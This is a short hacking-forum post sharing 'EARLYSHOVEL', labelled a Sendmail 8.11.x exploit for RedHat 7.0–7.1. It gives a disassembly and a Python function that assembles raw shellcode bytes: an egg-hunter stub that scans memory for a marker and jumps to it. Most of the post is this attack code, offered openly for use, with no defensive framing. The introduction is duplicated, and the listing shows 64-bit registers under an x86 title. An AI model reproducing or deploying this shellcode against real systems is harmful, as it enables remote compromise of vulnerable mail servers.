EARLYSHOVEL disassembly (x86) 04-03-2022, 02:09 AM
#1
EARLYSHOVEL
What is it?
A RedHat 7.0 - 7.1 Sendmail 8.11.x exploit
The original Python and ASM should interest you
More to follow..
What is it?
A RedHat 7.0 - 7.1 Sendmail 8.11.x exploit
The original Python and ASM should interest you
Code:
# https://gist.github.com/84a98b20a6c4186890f1520c5bd2caa0
# Disasembly D:
# 0000000000000000 EB1E JMP 0000000000000020
# 0000000000000002 59 POP RCX
# 0000000000000003 51 PUSH RCX
# 0000000000000004 FF31 PUSH QWORD PTR [RCX]
# 0000000000000006 59 POP RCX
# 0000000000000007 58 POP RAX
# 0000000000000008 31DB XOR EBX,EBX
# 000000000000000A B304 MOV BL,04
# 000000000000000C 01D8 ADD EAX,EBX
# 000000000000000E F6DB NEG BL
# 0000000000000010 20D8 AND AL,BL
# 0000000000000012 F6DB NEG BL
# 0000000000000014 01D8 ADD EAX,EBX
# 0000000000000016 3B08 CMP ECX,DWORD PTR [RAX]
# 0000000000000018 75FA JNE 0000000000000014
# 000000000000001A 01D8 ADD EAX,EBX
# 000000000000001C 50 PUSH RAX
# 000000000000001D 59 POP RCX
# 000000000000001E FFE1 JMP RCX
# 0000000000000020 E8DDFFFFFF CALL 0000000000000002
# 0000000000000025 51 PUSH RCX
# 0000000000000026 51 PUSH RCX
# 0000000000000027 51 PUSH RCX
# 0000000000000028 51 PUSH RCX
#!/usr/bin/python
spin = "\xeb\x1e"
start = "\x59\x51\xff\x31\x59\x58\x31\xdb\xb3\x04\x01\xd8\xf6\xdb\x20\xd8" "\xf6\xdb"
findit = "\x01\xd8\x3b\x08\x75\xfa"
found = "\x01\xd8\x50\x59\xff\xe1"
end = "\xe8\xdd\xff\xff\xff"
# marker
data = "\x51\x51\x51\x51"
def build():
tmp = spin + start + findit + found + end + data
return tmpMore to follow..
ed25519/0x21AB6B6A6CB2C337
C87D87466FD205945CF10A3821AB6B6A6CB2C337
C87D87466FD205945CF10A3821AB6B6A6CB2C337
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)